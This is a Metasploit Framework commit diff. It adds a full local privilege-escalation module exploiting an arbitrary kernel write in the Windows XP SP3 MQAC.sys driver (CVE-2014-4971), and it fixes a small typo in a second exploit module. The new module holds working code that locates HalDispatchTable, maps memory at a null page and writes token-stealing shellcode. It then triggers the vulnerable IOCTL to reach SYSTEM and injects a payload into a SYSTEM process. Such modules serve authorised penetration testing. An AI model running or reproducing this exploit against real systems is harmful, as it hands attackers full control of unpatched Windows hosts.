Land rapid7#3557 : MQAC arbitrary write priv esc XP SP3

OJ · OJ · commit ddf0636dabd8 · 2014-07-24T11:24:56.000+10:00
diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
@@ -0,0 +1,203 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within the MQAC.sys module allows an attacker to
+        overwrite an arbitrary location in kernel memory.
+
+        This module will elevate itself to SYSTEM, then inject the payload
+        into another SYSTEM process.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin', # original exploit and all the hard work
+          'Spencer McIntyre' # MSF module
+        ],
+      'Arch'           => [ ARCH_X86 ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'   => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3',
+            {
+              '_KPROCESS' => "\x44",
+              '_TOKEN' => "\xc8",
+              '_UPID' => "\x84",
+              '_APLINKS' => "\x88"
+            }
+          ],
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2014-4971' ],
+          [ 'EDB', '34112' ],
+          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
+        ],
+      'DisclosureDate'=> 'Jul 22 2014',
+      'DefaultTarget' => 0
+    }))
+  end
+
+  def find_sys_base(drvname)
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+        return [address, current_drvname]
+      end
+    end
+  end
+
+  # Function borrowed from smart_hashdump
+  def get_system_proc
+    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
+    local_sys = resolve_sid("S-1-5-18")
+    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
+
+    this_pid = session.sys.process.getpid
+    # Processes that can Blue Screen a host if migrated in to
+    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    session.sys.process.processes.each do |p|
+      # Check we are not migrating to a process that can BSOD the host
+      next if dangerous_processes.include?(p["name"])
+      next if p["pid"] == this_pid
+      next if p["pid"] == 4
+      next if p["user"] != system_account_name
+      return p
+    end
+  end
+
+  def open_device
+    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    if handle['return'] == 0
+      print_error('Failed to open the \\\\.\\MQAC device')
+      return nil
+    end
+    handle = handle['return']
+  end
+
+  def check
+    handle = open_device
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    os = sysinfo["OS"]
+    case os
+    when /windows xp.*service pack 3/i
+      return Exploit::CheckCode::Appears
+    when /windows xp/i
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    if sysinfo["Architecture"] =~ /wow64/i
+      print_error("Running against WOW64 is not supported")
+      return
+    elsif sysinfo["Architecture"] =~ /x64/
+      print_error("Running against 64-bit systems is not supported")
+      return
+    end
+
+    if is_system?
+      print_error("This meterpreter session is already running as SYSTEM")
+      return
+    end
+
+    kernel_info = find_sys_base(nil)
+    base_addr = 0xffff
+    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
+
+    handle = open_device
+    return if handle.nil?
+
+    this_proc = session.sys.process.open
+    unless this_proc.memory.writable?(base_addr)
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+    end
+    unless this_proc.memory.writable?(base_addr)
+      print_error('Failed to properly allocate memory')
+      this_proc.close
+      return
+    end
+
+    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    hKernel = hKernel['return']
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    halDispatchTable = halDispatchTable['return']
+    halDispatchTable -= hKernel
+    halDispatchTable += kernel_info[0]
+    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+
+    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
+    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+
+    shellcode = make_nops(0x200) + tokenstealing
+    this_proc.memory.write(0x1, shellcode)
+    this_proc.close
+
+    print_status("Triggering vulnerable IOCTL")
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
+    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+
+    unless is_system?
+      print_error("Exploit failed")
+      return
+    end
+
+    proc = get_system_proc
+    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
+    unless execute_shellcode(payload.encoded, nil, proc['pid'])
+      fail_with(Failure::Unknown, "Error while executing the payload")
+    end
+  end
+
+end
diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -126,7 +126,7 @@ def exploit
     if sysinfo["Architecture"] =~ /wow64/i
       print_error("Running against WOW64 is not supported")
       return
-    elsif sysinfo["Architectore"] =~ /x64/
+    elsif sysinfo["Architecture"] =~ /x64/
       print_error("Running against 64-bit systems is not supported")
       return
     end
